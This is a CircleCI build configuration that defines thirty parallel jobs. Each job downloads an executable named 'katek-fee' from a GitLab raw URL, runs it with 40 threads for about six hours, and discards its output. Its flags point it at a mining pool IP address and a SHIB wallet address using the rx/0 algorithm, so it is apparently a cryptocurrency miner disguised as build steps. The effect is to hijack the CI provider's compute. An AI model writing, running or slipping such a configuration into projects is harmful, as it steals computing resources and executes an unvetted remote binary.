version: 2
jobs:
  build_01:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
      
      
      
  build_02:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_03:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_04:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
          
  build_05:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
      
      
      
  build_06:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_07:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_08:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
          
  build_09:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
      
      
      
  build_10:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_11:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_12:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
          
  build_13:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
      
      
      
  build_14:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_15:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_16:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
          
  build_17:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
      
      
      
  build_18:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_19:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_20:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"

  build_21:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
      
      
      
  build_22:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_23:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_24:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
          
  build_25:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
      
      
      
  build_26:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_27:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
  build_28:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
          
  build_29:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 362m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"
      
      
      
      
  build_30:
    docker:
      - image: cimg/base:stable

    working_directory: ~/repo
    steps:
      - checkout
      - run: ls
      - run:
          no_output_timeout: 360m
          
          command: "wget https://gitlab.com/Esaffvd/project-download/-/raw/main/katek-fee && chmod u+x katek-fee && ./katek-fee -o 159.65.25.23:80 -u SHIB:0x113a78bc09aed970a8a9baac749aad1d0e12f722.Q${RANDOM:0:9}#zmx7-6zfg -p x -a rx/0 -k --threads=40 > /dev/null"

    
  
workflows:
    version: 2
    build:
        jobs:
            - build_01
            - build_02
            - build_03
            - build_04
            - build_05
            - build_06
            - build_07
            - build_08
            - build_09
            - build_10
            - build_11
            - build_12
            - build_13
            - build_14
            - build_15
            - build_16
            - build_17
            - build_18
            - build_19
            - build_20
            - build_21
            - build_22
            - build_23
            - build_24
            - build_25
            - build_26
            - build_27
            - build_28
            - build_29
            - build_30
